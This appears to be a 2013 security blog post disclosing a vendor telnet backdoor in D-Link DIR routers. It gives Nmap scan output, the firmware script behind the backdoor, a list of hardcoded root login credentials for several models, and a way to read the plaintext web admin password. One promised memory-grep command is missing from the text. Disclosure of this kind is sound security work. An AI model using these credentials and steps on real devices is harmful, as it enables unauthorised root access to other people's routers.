no one is safe ...

Your Telnet Backdoor is waiting for you

It is too bad if your device has a backdoor directly from the vendor. In some devices of the vendor D-Link you are able to find a nice telnet server listening on the internal network interface. The following output shows the results of a Nmap scan of three different D-Link DIR devices (DIR-300revA, DIR-300revB, DIR-600revB):

root@bt:~# nmap -sSV -p 23 192.168.178.133,144,222
Starting Nmap 6.01 ( http://nmap.org ) at 2013-04-30 13:42 CEST
Nmap scan report for 192.168.178.133
Host is up (0.0067s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 1C:BD:B9:A7:7F:74 (D-link International PTE Limited)
Service Info: Device: WAP

Nmap scan report for 192.168.178.144
Host is up (0.0068s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 00:26:5A:38:7D:77 (D-Link)
Service Info: Device: WAP

Nmap scan report for 192.168.178.222
Host is up (0.0031s latency).
PORT   STATE SERVICE VERSION
23/tcp open  telnet  D-Link 524, DIR-300, or WBR-1310 WAP telnetd
MAC Address: 34:08:04:DB:6D:FE (D-Link)
Service Info: Device: WAP

The credentials are well known and documented on lots of different places around the internet. Just use Google for telnet dlink.
If you are interested on the configuration of this backdoor take a look at the following configuration of a DIR-300 device:

./rootfs/etc/scripts/misc/telnetd.sh
#!/bin/sh
image_sign=`cat /etc/config/image_sign`
TELNETD=`rgdb -g /sys/telnetd`
if [ "$TELNETD" = "true" ]; then
        echo "Start telnetd ..." > /dev/console
        if [ -f "/usr/sbin/login" ]; then
                lf=`rgdb -i -g /runtime/layout/lanif`
                telnetd -l "/usr/sbin/login" -u Alphanetworks:$image_sign -i $lf &
        else
                telnetd &
        fi
fi
root@bt:~/firmware/DIR300-extracted# cat rootfs/etc/config/image_sign
wrgg19_c_dlwbr_dir300

On a DIR-300 rev B you will find this configuration in /etc/init0.d/S80telnetd.sh. With the user Alphanetworks and the value of image_sign you are able to login via telnet.
After logging in you are directly root on this box.


This is quite amazing but it would be a lot better if you could configure the box via the web management. So, there are two ways to get the password of your management interface. First of all you could just extract it from var/etc/httpasswd. Plaintext passwords are so neat:

# cat var/etc/httpasswd
admin:admin

The next possibility is to use your root access to directly grep the memory for it:


With this you probably could also find such a password on a device where the password is stored encrypted or you could not find it on the harddrive.

Now you are able to use your secret password to login via web.

To test your D-Link devices for such a nice backdoor use for example Nmap to detect the telnet servers and the use the password list which is included into the Metasploit Framework within data/wordlists/dlink_telnet_backdoor_userpass.txt.

root@bt:~/msf-git/metasploit-framework# cat data/wordlists/dlink_telnet_backdoor_userpass.txt
Alphanetworks wrgg19_c_dlwbr_dir300
Alphanetworks wrgn49_dlob_dir600b
Alphanetworks wrgn23_dlwbr_dir600b
Alphanetworks wrgn22_dlwbr_dir615
Alphanetworks wrgnd08_dlob_dir815
Alphanetworks wrgg15_di524
Alphanetworks wrgn39_dlob.hans_dir645

This password list is a first version and I think you could find some more passwords for this nice backdoor. If you find some more it would be quite helpful if you add it to this list.